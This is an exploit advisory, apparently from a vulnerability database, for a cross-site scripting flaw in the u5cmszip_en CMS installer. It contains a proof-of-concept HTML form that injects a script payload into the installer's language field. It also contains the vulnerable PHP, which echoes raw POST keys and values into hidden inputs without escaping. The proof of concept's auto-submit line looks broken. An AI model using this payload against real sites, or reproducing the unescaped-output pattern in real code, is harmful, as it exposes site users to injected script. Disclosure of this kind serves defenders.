u5cmszip_en Cms Cross Site Scripting

Published
Credit
Risk
2016.12.28
Ashiyane Digital Security Team
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|=============================================================|
|[+] Exploit Title: u5cmszip_en Cms Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor Homepage: http://yuba.ch/
|[+]
|[+] Download Link : http://yuba.ch/f.php?f=r/u5cmszip/u5cmszip_en.zip?t=1479045196
|[+]
|[+] Tested on: Kali Linux
|[+]
|[+] Date: 12 /27 / 2016
|=============================================================|
|[+] Exploit Code:

<html>
<head><title>Cross Site Scripting</title></head>
<body>
<form action="http://127.0.0.1/3/CMS/install/start.php" method="post" name="installation_step0">
<select name="language" class="language">
<option value="de">deutsch</option>
<option value="en" selected="selected">english</option>
<option value="es">spanish</option>
</select>
<input type="hidden" name="language" id="language" value="en'"()&%<acx><ScRiPt>alert(123)</ScRiPt>" />
</form>
<script language="Javascript">
setTimeout('http://127.0.0.1/3/CMS/install/start.php.submit()', 1);
</script>

</body>
</html>
============================================================
Vulnerable code :

<form action="step1.php" method="post" name="installation_step0">

<h4>Please choose a language | Bitte w&auml;hlen Sie eine Sprache | Porfavor elig&eacute; una idioma:</h4>

<select name="language" class="language">
<?php
$countries = shortTag_countries();
foreach ($countries as $country => $iso) {
print "<option value="{$iso}"" . (strtolower($iso) == $http_lang? 'selected="selected"': '') . ">"
. htmlentities($country) . "</option>\n";
}
?>
</select>

<?php foreach ( $_POST as $key => $value ) { ?>
<?php if ( !strpos($key, 'password') ) { ?>
<input type="hidden" name="<?php echo $key ?>" id="<?php echo $key ?>" value="<?php echo $value ?>" />
<?php } } ?>

<input type="image" src="button_next.gif" alt="next" title="Next step" align="right" border="0" />

</form>

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : M.R.S.L.Y
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com